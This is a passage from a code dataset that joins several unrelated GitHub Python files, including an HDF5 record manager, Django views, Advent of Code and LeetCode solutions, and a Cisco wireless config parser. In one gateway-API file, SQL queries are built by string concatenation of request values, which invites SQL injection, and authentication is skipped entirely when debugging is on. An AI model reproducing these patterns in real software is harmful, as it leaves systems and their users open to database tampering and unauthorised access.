labels if regex.match(label) is not None\n ]\n\n summary = []\n with self._h5file('r') as h5file:\n for label in labels:\n g = h5file[label]\n attrs = get_decoded(g.attrs)\n if label in g:\n attrs.update(get_decoded(g[label].attrs))\n attrs['label'] = label\n summary.append(attrs)\n\n cols = [\n 'label', 'RecordType', 'Description', 'Empty', 'Deflate',\n 'Complex', 'ArraySize', 'Sparse', 'RecordSize', 'Class',\n 'FieldNames', 'Command',\n ]\n return DataFrame(summary, columns=cols).set_index('label').fillna('')\n\n def replace(self, label, data):\n \"\"\" Replace an existing dataset.\n\n Parameters\n ----------\n label : str\n The record label.\n data :\n The data with which to replace the record.\n\n Notes\n -----\n This is equivalent to removing the data and inserting a new entry using\n the same ``label``, ``description``, and ``deflate`` options.\n\n \"\"\"\n self._validate_can_write()\n self._validate_labels(label, must_exist=True)\n with self._h5file('r+') as h5file:\n attrs = get_decoded(h5file[label].attrs, 'Deflate', 'Description')\n del h5file[label]\n self.insert(label, data, attrs['Description'], attrs['Deflate'])\n\n def update_object(self, label, data):\n \"\"\" Update an existing object record.\n\n Parameters\n ----------\n label : str\n Label of the object record.\n data : dict\n The data with which to replace the object record.\n\n Notes\n -----\n This is more strict than **replace** in that the intention is to update\n the contents of an 'object' record while preserving the record type.\n The simplest way to make use of this is to *extract* an object record,\n replace some data, and then call this to update the stored record.\n\n \"\"\"\n self._validate_can_write()\n self._validate_labels(label, must_exist=True)\n\n cls = self._registry.get_inserter(data)\n if cls is None:\n msg = \"{!r} is not a supported type\".format(data)\n raise ValueError(msg)\n\n record_type = cls.record_type\n if record_type != 'structure':\n raise ValueError(\"Input data is not a dictionary\")\n\n with self._h5file('r+') as h5file:\n # Check the general structure of the data and file\n grp = h5file[label]\n attrs = get_decoded(grp.attrs)\n if not attrs['RecordType'] == 'object':\n raise ValueError(\"Record '{}' is not an object\".format(label))\n if attrs['Empty'] == 'yes':\n raise ValueError(\"Cannot update an empty record\")\n record_sig = unnest_record(grp)\n data_sig = unnest(data, self._registry)\n if not are_signatures_equivalent(record_sig, data_sig):\n msg = \"Data is not compatible with record '{}'\"\n raise ValueError(msg.format(label))\n\n del h5file[label]\n\n self.insert(label, data, attrs['Description'], int(attrs['Deflate']))\n\n # Fix the record type and update the header\n with self._h5file('r+') as h5file:\n grp = h5file[label]\n set_encoded(\n grp.attrs,\n RecordType='object',\n Class=attrs['Class'],\n )\n update_header(h5file.attrs)\n\n def update_objects(self, label, data):\n \"\"\" Update an existing objects record.\n\n Parameters\n ----------\n label : str\n Label of the objects record.\n data : list\n The data with which to replace the objects record.\n\n Notes\n -----\n This is more strict than **replace** in that the intention is to update\n the contents of an 'objects' record while preserving the record type.\n The simplest way to make use of this is to *extract* an objects record,\n replace some data, and then call this to update the stored record.\n\n \"\"\"\n self._validate_can_write()\n self._validate_labels(label, must_exist=True)\n\n cls = self._registry.get_inserter(data)\n if cls is None:\n msg = \"{!r} is not a supported type\".format(data)\n raise ValueError(msg)\n\n record_type = cls.record_type\n if record_type != 'cell':\n raise ValueError(\"Input data is not a list\")\n\n # To be an 'objects' record, this must look like a 'structures' record.\n data_sig = validate_structures(data, self._registry)\n\n with self._h5file('r+') as h5file:\n # Check the general structure of the data and file\n grp = h5file[label]\n attrs = get_decoded(grp.attrs)\n if not attrs['RecordType'] == 'objects':\n raise ValueError(\"Record '{}' is not an objects\".format(label))\n if attrs['Empty'] == 'yes':\n raise ValueError(\"Cannot update an empty record\")\n record_sig = unnest_record(grp['element 1'])\n if not are_signatures_equivalent(record_sig, data_sig):\n msg = \"Data is not compatible with record '{}'\"\n raise ValueError(msg.format(label))\n\n del h5file[label]\n\n self.insert(label, data, attrs['Description'], int(attrs['Deflate']))\n\n # Fix the record type and update the header\n with self._h5file('r+') as h5file:\n grp = h5file[label]\n set_encoded(\n grp.attrs,\n RecordType='objects',\n Class=attrs['Class'],\n )\n update_header(h5file.attrs)\n\n # Private\n\n @contextmanager\n def _h5file(self, mode):\n h5file = h5py.File(self._filename, mode, **self._kw)\n try:\n yield h5file\n finally:\n h5file.close()\n\n def _get_attr(self, attr, root=None):\n \"\"\" Get a named atribute as a string \"\"\"\n with self._h5file('r') as h5file:\n if root is None:\n obj = h5file\n else:\n obj = h5file[root]\n return get_decoded(obj.attrs, attr)[attr]\n\n def _validate_can_write(self):\n \"\"\" Validate file mode and 'Writable' attr allow writing. \"\"\"\n if self._mode not in WRITE_MODES:\n raise IOError(\"File is not writable\")\n if self.Writable == 'no':\n raise IOError(\"'Writable' flag is 'no'\")\n\n def _validate_labels(self, labels, can_exist=True, must_exist=False):\n if isinstance(labels, str):\n labels = [labels]\n if len(labels) == 0:\n raise ValueError(\"Must specify labels\")\n for label in labels:\n if '/' in label or '\\\\' in label:\n msg = r\"label cannot contain '/' or '\\'\"\n raise ValueError(msg)\n with self._h5file('r') as h5file:\n for label in labels:\n label_exists = label in h5file\n if not can_exist and label_exists:\n msg = \"Label '{}' already exists.\".format(label)\n raise ValueError(msg)\n if must_exist and not label_exists:\n msg = \"Label item '{}' does not exist\".format(label)\n raise ValueError(msg)\n","repo_name":"SMASHtoolbox/SDAlibrary","sub_path":"python/sdafile/sda_file.py","file_name":"sda_file.py","file_ext":"py","file_size_in_byte":21782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"9153950470","text":"from django.urls import path\r\n\r\nfrom . import views\r\n\r\napp_name=\"history\"\r\n\r\nurlpatterns = [\r\n path('', views.index, name='index'),\r\n path('/', views.details, name='details'),\r\n path('newArtist', views.newArtist, name='newArtist'),\r\n path('newSong', views.newSong, name='newSong'),\r\n path('deleteSong', views.deleteSong, name='deleteSong')\r\n\r\n]","repo_name":"jasehackman/12_Music_History","sub_path":"quick/history/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"723132699","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse,HttpResponseRedirect\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom .forms import *\n\n# Create your views here.\ndef registration(request):\n if request.method == 'POST':\n form = RegisterForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('/login')\n else:\n form = RegisterForm()\n return render(request, 'registration/sign-up.html', {\"form\": form})\n\n@login_required(login_url='/login')\ndef index(request):\n title = 'instagram-app'\n posts = Image.get_images()\n comments = Comment.get_all_comments()\n users = User.objects.all()\n current_user = request.user\n if request.method == 'POST':\n form = CommentForm(request.POST)\n image_id = request.POST['image_id']\n if form.is_valid():\n comment = form.save(commit=False)\n comment.author = current_user\n image = Image.get_image(image_id)\n comment.image = image\n comment.save()\n return redirect(f'/#{image_id}', )\n else:\n form = CommentForm(auto_id=False)\n\n param = {\n \"title\": title,\n \"posts\": posts,\n \"form\": form,\n \"comments\": comments,\n \"users\": users\n }\n return render(request, 'index.html', param)\n\n@login_required(login_url='/login')\ndef profile(request):\n pictures = Image.get_images()\n if request.method == 'POST':\n user_form = EditProfileForm(request.POST, instance=request.user)\n profile_form = ProfileUpdateForm(request.POST,request.FILES,instance=request.user.profile)\n if user_form.is_valid() and profile_form.is_valid():\n user_form.save()\n profile_form.save()\n messages.success(request, f'You have successfully updated your profile!')\n return HttpResponseRedirect(request.path_info)\n else:\n user_form = EditProfileForm(instance=request.user)\n profile_form = ProfileUpdateForm(request.POST,request.FILES,instance=request.user.profile)\n return render(request, 'profile.html', {\"user_form\": user_form, \"profile_form\": profile_form, \"pictures\": pictures})\n \n return render(request, 'profile.html', {\"pictures\": pictures})\n \n@login_required(login_url='/login')\ndef post_picture(request):\n current_user = request.user\n if request.method == 'POST':\n form = PostPictureForm(request.POST, request.FILES)\n if form.is_valid():\n image = form.save(commit=False)\n image.author = current_user\n image.save()\n return redirect('/')\n else:\n form = PostPictureForm(auto_id=False)\n return render(request, 'new_picture.html', {\"form\": form})\n \ndef search_by_username(request):\n if 'author' in request.GET and request.GET['author']:\n search_term = request.GET['author']\n searched_images = Image.get_author(search_term)\n message = f'{search_term}'\n user = User.objects.all()\n param = {\n \"user\": user,\n \"images\": searched_images,\n \"message\": message\n }\n return render(request, 'search.html', param)\n else:\n message = \"search for a user\"\n param = {\n \"message\": message\n }\n return render(request, 'search.html', param)\n\n\n","repo_name":"Codex-Mayrie/Instagram-application","sub_path":"instagram/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"11866931136","text":"import config\nimport hashlib\nimport time\n\n\ndef authenticate(uid, ip, x_auth_token):\n if config.debugging:\n print(\"WARNING: DEBUGGING MODE IS ON!\")\n return True\n connection = config.database.cursor(dictionary=True)\n connection.execute(\"SELECT * FROM \"+config.gatewaytable+\" WHERE uid = \"+str(uid)+\";\")\n results = connection.fetchall()\n if len(results) < 1:\n print(\"No Matching UID\")\n return False\n for result in results:\n # Try to match source IP\n if result['ip'] == ip:\n print(\"IP Match\")\n # Try to match x-auth-token hashed with unix time (for the last 10 seconds)\n unixtime = int(time.time())\n for i in range(unixtime-config.token_timeout, unixtime+config.token_timeout):\n print(\"Trying: \"+str(hashlib.sha512(result['x-auth-base']+str(i)).hexdigest()).upper()+\" vs \"+str(x_auth_token))\n if str(hashlib.sha512(result['x-auth-base']+str(i)).hexdigest()).upper() == str(x_auth_token):\n print(\"MATCH FOUND!\")\n return True\n print(\"Not authorized\")\n return False\n\n\ndef psk_lookup(uid, psk):\n connection = config.database.cursor(dictionary=True)\n connection.execute(\"SELECT * FROM \"+config.devicetable+\" WHERE token = '\"+str(psk)+\"' AND uid = \"+str(uid)+\";\")\n return connection.fetchall()\n\n\ndef dev_lookup(uid, id):\n connection = config.database.cursor(dictionary=True)\n connection.execute(\"SELECT * FROM \"+config.devicetable+\" WHERE id = \" + str(id) + \" AND uid = \" + str(uid) + \";\")\n return connection.fetchall()\n\n\ndef update_mac(id, mac):\n connection = config.database.cursor(dictionary=True)\n connection.execute(\"UPDATE \"+config.devicetable+\" SET macadd = '\"+mac+\"' WHERE id = \"+str(id)+\";\")\n config.database.commit()\n return True\n","repo_name":"noahburrell/gatewayapi","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"18496651382","text":"import pandas as pd\nimport streamlit as st\nimport seaborn as sns\nimport altair as alt\nimport matplotlib.pyplot as plt\nfrom math import pi\nst.title(\n \"Clustering Analysis\"\n\n)\n# st.image('images/c.png')\n\n# mall_data = pd.read_csv('data/Mall_Customers.csv')\n# mall_data.rename({'Annual Income (k$)':'Income', \\\n# 'Spending Score (1-100)':'Spend_score'}, axis=1, \\\n# inplace=True)\n#\n# st.write(mall_data.head())\n#\n#\n#\n# a = alt.Chart(mall_data).mark_bar().encode(\n# alt.X(\"Income\", bin=True),\n# y='count()'\n# )\n\n# st.altair_chart(a, use_container_width=True)\n\n\n\n\n\n\n# we can divided the gruops into 3 categories. By using age\n\n# hypotesis is a therory of explanmation based on evidence that is not yet proved to be true\n\n\n\n\n\n# Set data\ndf = pd.DataFrame({\n 'group': ['A','B','C','D'],\n 'var1': [38, 1.5, 30, 4],\n 'var2': [29, 10, 9, 34],\n 'var3': [8, 39, 23, 24],\n 'var4': [7, 31, 33, 14],\n 'var5': [28, 15, 32, 14]\n})\n\n# number of variable\ncategories=list(df)[1:]\nN = len(categories)\n\n# We are going to plot the first line of the data frame.\n# But we need to repeat the first value to close the circular graph:\nvalues=df.loc[0].drop('group').values.flatten().tolist()\nvalues += values[:1]\nvalues\n\n# What will be the angle of each axis in the plot? (we divide the plot / number of variable)\nangles = [n / float(N) * 2 * pi for n in range(N)]\nangles += angles[:1]\n\n# Initialise the spider plot\nax = plt.subplot(111, polar=True)\n\n# Draw one axe per variable + add labels\nplt.xticks(angles[:-1], categories, color='grey', size=8)\n\n# Draw ylabels\nax.set_rlabel_position(0)\nplt.yticks([10,20,30], [\"10\",\"20\",\"30\"], color=\"grey\", size=7)\nplt.ylim(0,40)\n\n# Plot data\nac = ax.plot(angles, values, linewidth=1, linestyle='solid')\n\n# Fill area\nax.fill(angles, values, 'b', alpha=0.1)\n\n# Show the graph\nst.pyplot(plt.show())","repo_name":"jluna1398/marketing","sub_path":"pages/page_2.py","file_name":"page_2.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"72322887869","text":"#CCIE/CCSI:Yasser Ramzy Auda\r\n#https://www.facebook.com/yasser.auda\r\n#https://www.linkedin.com/in/yasserauda/\r\n#https://github.com/YasserAuda/PythonForNetowrk-Cisco\r\n\r\n#\tPython Program to Map Two Lists into a Dictionary \r\nkeys=[]\r\nvalues=[]\r\nn=int(input(\"Enter number of elements for dictionary:\"))\r\nprint(\"For keys:\")\r\nfor x in range(0,n):\r\n element=int(input(\"Enter element\" + str(x+1) + \":\"))\r\n keys.append(element)\r\nprint(\"For values:\")\r\nfor x in range(0,n):\r\n element=int(input(\"Enter element\" + str(x+1) + \":\"))\r\n values.append(element)\r\nd=dict(zip(keys,values))\r\nprint(\"The dictionary is:\")\r\nprint(d)\r\n\r\n#Enter number of elements for dictionary:4\r\n#For keys:\r\n#Enter element1:1\r\n#Enter element2:2\r\n#Enter element3:3\r\n#Enter element4:4\r\n#For values:\r\n#Enter element1:5\r\n#Enter element2:6\r\n#Enter element3:7\r\n#Enter element4:8\r\n#The dictionary is:\r\n#{1: 5, 2: 6, 3: 7, 4: 8}\r\n","repo_name":"YasserAuda/PythonForNetowrk-Cisco","sub_path":"8 Loops dic2.py","file_name":"8 Loops dic2.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"6"} +{"seq_id":"8103575338","text":"#\n# @lc app=leetcode id=21 lang=python3\n#\n# [21] Merge Two Sorted Lists\n#\n\n# @lc code=start\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def mergeTwoLists(self, list1: Optional[ListNode], list2: Optional[ListNode]) -> Optional[ListNode]:\n \n if not list1: return list2\n if not list2: return list1\n\n lil, big = (list1, list2) if list1.val < list2.val else (list2, list1)\n lil.next = self.mergeTwoLists(lil.next, big)\n \n return lil\n\n\n '''\n res = NewList = ListNode()\n while list1 and list2:\n if list1.val < list2.val:\n NewList.next = list1\n list1 = list1.next\n else:\n NewList.next = list2\n list2 = list2.next\n NewList = NewList.next\n if list1:\n NewList.next = list1\n elif list2:\n NewList.next = list2\n return res.next \n '''\n\n \n\n# @lc code=end\n\n","repo_name":"HongyuZhu999/LeetCode","sub_path":"21.merge-two-sorted-lists.py","file_name":"21.merge-two-sorted-lists.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"13461646462","text":"\"\"\"\nThe set [1,2,3,…,n] contains a total of n! unique permutations.\n\nBy listing and labeling all of the permutations in order,\nWe get the following sequence (ie, for n = 3):\n\n \"123\"\n \"132\"\n \"213\"\n \"231\"\n \"312\"\n \"321\"\n\nGiven n and k, return the kth permutation sequence.\n\nNote: Given n will be between 1 and 9 inclusive.\n\"\"\"\n\nclass Solution(object):\n def getPermutation(self, n, k):\n \"\"\"\n :type n: int\n :type k: int\n :rtype: str\n \"\"\"\n facts = [1]\n for i in range(1, n):\n facts.append(i * facts[-1])\n # def getPermutationRecur(unused, i):\n # l = len(unused)\n # if l == 0:\n # return \"\"\n # first_digit = i // facts[l - 1]\n # return unused[first_digit] + getPermutationRecur(unused[:first_digit] + unused[first_digit + 1:], i % facts[l - 1])\n # return getPermutationRecur([str(v + 1) for v in range(n)], k - 1)\n ans = \"\"\n unused = [str(v + 1) for v in range(n)]\n i = k - 1\n while n > 0:\n n -= 1\n ans += unused[i // facts[n]]\n unused.remove(ans[-1])\n i %= facts[n]\n return ans\n\nans = Solution()\nfor i in range(1, 7):\n print(ans.getPermutation(3, i))\n\nfor i in range(1, 25):\n print(ans.getPermutation(9, i))\n","repo_name":"szhongren/leetcode","sub_path":"60/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"43333679507","text":"import regex\n\n\ndef parse_rules(path):\n rules = {}\n inputs = []\n with open(path) as fp:\n lines = fp.readlines()\n for line in lines:\n line = line.strip()\n if ':' in line:\n key, val = line.strip().split(': ')\n if val.startswith('\"'):\n val = val.strip('\"')\n rules[int(key)] = val\n else:\n inputs.append(line)\n\n return rules, inputs\n\n\ndef is_resolved(key, rule, resolved):\n for segment in rule.split():\n if segment == '|' or segment == 'a' or segment == 'b':\n continue\n if int(segment) in resolved:\n continue\n\n return False\n return True\n\n\ndef resolve_rules(rules):\n unresolved = dict(rules)\n resolved = {}\n while unresolved:\n new_resolved = []\n for key, val in unresolved.items():\n if is_resolved(key, val, resolved):\n resolved[key] = val\n new_resolved.append(key)\n\n for key in new_resolved:\n del unresolved[key]\n\n return resolved\n\n\ndef expand_rule(resolved, idx, modified=False):\n rule = resolved[idx]\n if len(rule) == 1:\n return rule\n result = ''\n if modified:\n if idx == 8:\n return f'({expand_rule(resolved, 42, modified)}+)'\n if idx == 11:\n res = f'({expand_rule(resolved, 42, modified)}(?R)?{expand_rule(resolved, 31, modified)})'\n return res\n\n sectional = False\n for segment in rule.split():\n if segment == '|':\n result += '|'\n sectional = True\n else:\n try:\n result += (expand_rule(resolved, int(segment), modified))\n except Exception as ex:\n print(idx, ':', rule, modified)\n raise ex\n\n if sectional:\n return f'({result})'\n return result\n\n\ndef count_matches(lines, resolved, modified=False):\n pattern = regex.compile(expand_rule(resolved, 0, modified))\n total = 0\n for line in lines:\n m = pattern.match(line)\n if m:\n start, end = m.span()\n print(start, end, len(line))\n if len(line) == (end - start):\n total += 1\n return total\n\n\ndef check_string(original_text, resolved, modified=False):\n sections = resolved[0].split(' | ')\n for section in sections:\n text = original_text\n subrules = section.split()\n found = True\n for sr in subrules:\n p = regex.compile(f'^{expand_rule(resolved, int(sr), modified)}')\n print(p)\n m = p.match(text)\n if m is not None:\n text = text[m.end():]\n else:\n found = False\n break\n if found and not text:\n return True\n return False\n\n\ndef resolve_enumerate(idx, rules, resolved=dict()):\n rule = rules[idx]\n if len(rule) == 1:\n resolved[idx] = [rule]\n\n if idx in resolved:\n return resolved[idx]\n\n full_results = []\n for section in rule.split(' | '):\n results = ['']\n for sr in section.split():\n temp = resolve_enumerate(int(sr), rules, resolved)\n temp_results = []\n for r in results:\n for t in temp:\n temp_results.append(f'{r}{t}')\n results = temp_results\n full_results += results\n\n resolved[idx] = full_results\n return full_results\n\n\ndef match_8(line, eight):\n for option in eight:\n if line.startswith(option):\n return True\n return False\n\n\ndef match_11(line, eleven):\n for option in eleven:\n h1, h2 = option[:len(option)//2], option[len(option)//2:]\n if line.startswith(h1) and line.endswith(h2):\n return True\n return False\n\n\ndef check_11(line, eleven):\n len11 = len(eleven[0])\n if not line or len(line) % len11 != 0:\n return False\n while line:\n if match_11(line, eleven):\n line = line[len11//2:-len11//2]\n else:\n return False\n return True\n\n\ndef parse_modified(line, eight, eleven):\n len8 = len(eight[0])\n len11 = len(eleven[0])\n\n if match_8(line, eight):\n line = line[len8:]\n else:\n return False\n\n while True:\n if check_11(line, eleven):\n return True\n\n if match_8(line, eight):\n line = line[len8:]\n else:\n return False\n\n return False\n\n\nif __name__ == '__main__':\n rules, inputs = parse_rules('data/d19_input1_large.txt')\n resolved = set(resolve_enumerate(0, rules))\n print(sum(1 for line in inputs if line in resolved))\n\n eight = resolve_enumerate(8, rules)\n eleven = resolve_enumerate(11, rules)\n print(sum(1 for line in inputs if parse_modified(line, eight, eleven)))\n","repo_name":"hiranya911/coding-challenges","sub_path":"AdventOfCode2020/d19.py","file_name":"d19.py","file_ext":"py","file_size_in_byte":4829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"19535532076","text":"import logging\n\n#Common functions for customized objects\ndef show(object_instance):\n if hasattr(object_instance, 'objname') == False:\n print('ERROR: Show function should be used only for customized classes!!!')\n return None\n if isinstance(object_instance, NamedList): # For NAMED LISTS\n for index, item in enumerate(object_instance):\n show(item)\n for attr, value in object_instance.__dict__.items():\n # print(type(value))\n if isinstance(value, NamedList): # For NAMED LISTS\n for item in value:\n show(item)\n else:\n print(attr, value)\n\n\ndef grep(object_instance, keyword):\n # Function to find attributes and values in objects by keyword\n if hasattr(object_instance, 'objname') == False:\n print('ERROR: GREP function should be used only for customized classes!!!')\n return None\n if isinstance(object_instance, NamedList): # For NAMED LISTS\n for index, item in enumerate(object_instance):\n grep(item, keyword)\n for attr, value in object_instance.__dict__.items():\n if isinstance(value, NamedList): # For NAMED LISTS\n for item in value:\n grep(item, keyword)\n else:\n if keyword in attr:\n print(object_instance, attr, value)\n if hasattr(value, 'objname'):\n grep(value, keyword)\n if value is not None and hasattr(value, 'objname') == False:\n if keyword in value:\n print(object_instance, attr, value)\n\n\n#Customized classes descriptions section\nclass NamedList(list): # Special class to refer to its name in object tree\n def __init__(self, list_name, item_name):\n self.objname = list_name\n self.item_name = item_name\n\n def __getitem__(self, name):\n x = NamedList(self.objname, self.item_name) # Clone the same object type as called\n for item in self:\n if item.name == name:\n x.append(item)\n if len(x) == 1: # if only one item should be returned - no need to return the list\n copied_list = x.copy()\n return copied_list.pop() # Should do pop() only for list copy to make list unchanged\n elif len(x) == 0:\n if name is not None:\n print('WARNING! Zero elements with name ', name, ' was found ')\n return x\n else:\n print('WARNING! More than one element with name ', name,\n ' was found. Use filter() to find necessary item by matching other attributes')\n return x\n\n def filter(self, attrname, required_value):\n x = NamedList(self.objname, self.item_name) # Clone the same object type as called\n for item in self:\n try:\n real_value = getattr(item, attrname)\n if real_value == required_value:\n x.append(item)\n\n except KeyError as e:\n print('No attribute with name ', attrname)\n return None\n except:\n print('Other error ')\n return None\n if len(x) == 1: # if only one item should be returned - no need to return the list\n copied_list = x.copy()\n return copied_list.pop() # Should do pop() only for list copy to make list unchanged\n else:\n return x\n\n def __str__(self):\n x = ''\n item_objname = ''\n length = len(self)\n if length == 0:\n return 'Named List of length ' + str(length) + ' with items ' + self.item_name\n for index, item in enumerate(self):\n x = x + ' ' + item.name + ', '\n item_objname = item.objname\n x = 'Named List of length ' + str(length) + ' with items ' + self.item_name + ':' + x\n return x[:-2]\n\n def __repr__(self):\n x = ''\n item_objname = ''\n length = len(self)\n if length == 0:\n return 'Named List of length ' + str(length) + ' with items ' + self.item_name\n for index, item in enumerate(self):\n x = x + ' ' + item.name + ', '\n item_objname = item.objname\n x = 'Named List of length ' + str(length) + ' with items ' + self.item_name + ':' + x\n return x[:-2]\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Band24_Config():\n def __init__(self, name=None):\n self.objname = '2.4GHz config'\n self.name = '2.4GHz config'\n self.type = 'config' # defines if class contain operational or config data\n self.d_802_11b_network = None\n self.d_11gsupport = None\n self.d_11nsupport = None\n self.d_802_11b_g_operational_rates = None\n self.d_802_11b_g_operational_rates_802_11b_g_1m_rate = None\n self.d_802_11b_g_operational_rates_802_11b_g_2m_rate = None\n self.d_802_11b_g_operational_rates_802_11b_g_5_5m_rate = None\n self.d_802_11b_g_operational_rates_802_11b_g_11m_rate = None\n self.d_802_11b_g_operational_rates_802_11g_6m_rate = None\n self.d_802_11b_g_operational_rates_802_11g_9m_rate = None\n self.d_802_11b_g_operational_rates_802_11g_12m_rate = None\n self.d_802_11b_g_operational_rates_802_11g_18m_rate = None\n self.d_802_11b_g_operational_rates_802_11g_24m_rate = None\n self.d_802_11b_g_operational_rates_802_11g_36m_rate = None\n self.d_802_11b_g_operational_rates_802_11g_48m_rate = None\n self.d_802_11b_g_operational_rates_802_11g_54m_rate = None\n self.d_802_11n_mcs_settings = None\n self.d_802_11n_mcs_settings_mcs_0 = None\n self.d_802_11n_mcs_settings_mcs_1 = None\n self.d_802_11n_mcs_settings_mcs_2 = None\n self.d_802_11n_mcs_settings_mcs_3 = None\n self.d_802_11n_mcs_settings_mcs_4 = None\n self.d_802_11n_mcs_settings_mcs_5 = None\n self.d_802_11n_mcs_settings_mcs_6 = None\n self.d_802_11n_mcs_settings_mcs_7 = None\n self.d_802_11n_mcs_settings_mcs_8 = None\n self.d_802_11n_mcs_settings_mcs_9 = None\n self.d_802_11n_mcs_settings_mcs_10 = None\n self.d_802_11n_mcs_settings_mcs_11 = None\n self.d_802_11n_mcs_settings_mcs_12 = None\n self.d_802_11n_mcs_settings_mcs_13 = None\n self.d_802_11n_mcs_settings_mcs_14 = None\n self.d_802_11n_mcs_settings_mcs_15 = None\n self.d_802_11n_mcs_settings_mcs_16 = None\n self.d_802_11n_mcs_settings_mcs_17 = None\n self.d_802_11n_mcs_settings_mcs_18 = None\n self.d_802_11n_mcs_settings_mcs_19 = None\n self.d_802_11n_mcs_settings_mcs_20 = None\n self.d_802_11n_mcs_settings_mcs_21 = None\n self.d_802_11n_mcs_settings_mcs_22 = None\n self.d_802_11n_mcs_settings_mcs_23 = None\n self.d_802_11n_mcs_settings_mcs_24 = None\n self.d_802_11n_mcs_settings_mcs_25 = None\n self.d_802_11n_mcs_settings_mcs_26 = None\n self.d_802_11n_mcs_settings_mcs_27 = None\n self.d_802_11n_mcs_settings_mcs_28 = None\n self.d_802_11n_mcs_settings_mcs_29 = None\n self.d_802_11n_mcs_settings_mcs_30 = None\n self.d_802_11n_mcs_settings_mcs_31 = None\n self.d_802_11n_status = None\n self.d_802_11n_status_a_mpdu_tx = None\n self.d_802_11n_status_a_mpdu_tx_priority_0 = None\n self.d_802_11n_status_a_mpdu_tx_priority_1 = None\n self.d_802_11n_status_a_mpdu_tx_priority_2 = None\n self.d_802_11n_status_a_mpdu_tx_priority_3 = None\n self.d_802_11n_status_a_mpdu_tx_priority_4 = None\n self.d_802_11n_status_a_mpdu_tx_priority_5 = None\n self.d_802_11n_status_a_mpdu_tx_priority_6 = None\n self.d_802_11n_status_a_mpdu_tx_priority_7 = None\n self.d_802_11n_status_a_mpdu_tx_aggregation_scheduler = None\n self.d_802_11n_status_a_mpdu_tx_aggregation_scheduler_realtime_timeout = None\n self.d_802_11n_status_a_mpdu_tx_aggregation_scheduler_non_realtime_timeout = None\n self.d_802_11n_status_a_msdu_tx = None\n self.d_802_11n_status_a_msdu_tx_priority_0 = None\n self.d_802_11n_status_a_msdu_tx_priority_1 = None\n self.d_802_11n_status_a_msdu_tx_priority_2 = None\n self.d_802_11n_status_a_msdu_tx_priority_3 = None\n self.d_802_11n_status_a_msdu_tx_priority_4 = None\n self.d_802_11n_status_a_msdu_tx_priority_5 = None\n self.d_802_11n_status_a_msdu_tx_priority_6 = None\n self.d_802_11n_status_a_msdu_tx_priority_7 = None\n self.d_802_11n_status_a_msdu_max_subframes = None\n self.d_802_11n_status_a_msdu_max_length = None\n self.d_802_11n_status_rifs_rx = None\n self.d_802_11n_status_guard_interval = None\n self.beacon_interval = None\n self.cf_pollable_mode = None\n self.cf_poll_request_mandatory = None\n self.cfp_period = None\n self.cfp_maximum_duration = None\n self.default_channel = None\n self.default_tx_power_level = None\n self.dtpc_status = None\n self.rssi_low_check = None\n self.rssi_threshold = None\n self.call_admission_limit = None\n self.g711_cu_quantum = None\n self.ed_threshold = None\n self.fragmentation_threshold = None\n self.pbcc_mandatory = None\n self.rts_threshold = None\n self.short_preamble_mandatory = None\n self.short_retry_limit = None\n self.legacy_tx_beamforming_setting = None\n self.traffic_stream_metrics_status = None\n self.expedited_bw_request_status = None\n self.world_mode = None\n self.faster_carrier_tracking_loop = None\n self.edca_profile_type = None\n self.voice_mac_optimization_status = None\n self.call_admission_control_cac_configuration = None\n self.call_admission_control_cac_configuration_voice_ac_admission_control_acm = None\n self.call_admission_control_cac_configuration_voice_stream_size = None\n self.call_admission_control_cac_configuration_voice_max_streams = None\n self.call_admission_control_cac_configuration_voice_max_rf_bandwidth = None\n self.call_admission_control_cac_configuration_voice_reserved_roaming_bandwidth = None\n self.call_admission_control_cac_configuration_voice_cac_method = None\n self.call_admission_control_cac_configuration_voice_tspec_inactivity_timeout = None\n self.cac_sip_voice_configuration = None\n self.cac_sip_voice_configuration_sip_based_cac = None\n self.cac_sip_voice_configuration_sip_codec_type = None\n self.cac_sip_voice_configuration_sip_call_bandwidth = None\n self.cac_sip_voice_configuration_sip_call_bandwidth_sample_size = None\n self.cac_sip_voice_configuration_video_ac_admission_control_acm = None\n self.cac_sip_voice_configuration_video_max_rf_bandwidth = None\n self.cac_sip_voice_configuration_video_reserved_roaming_bandwidth = None\n self.cac_sip_voice_configuration_video_load_based_cac_mode = None\n self.cac_sip_voice_configuration_video_cac_method = None\n self.cac_sip_video_configuration = None\n self.cac_sip_video_configuration_sip_based_cac = None\n self.cac_sip_video_configuration_best_effort_ac_admission_control_acm = None\n self.cac_sip_video_configuration_background_ac_admission_control_acm = None\n self.maximum_number_of_clients_per_ap = None\n self.l2roam_802_11bg_rf_parameters = None\n self.l2roam_802_11bg_rf_parameters_config_mode = None\n self.l2roam_802_11bg_rf_parameters_minimum_rssi = None\n self.l2roam_802_11bg_rf_parameters_roam_hysteresis = None\n self.l2roam_802_11bg_rf_parameters_scan_threshold = None\n self.l2roam_802_11bg_rf_parameters_transition_time = None\n\n def __str__(self):\n return '802.11b network config'\n\n def __repr__(self):\n return 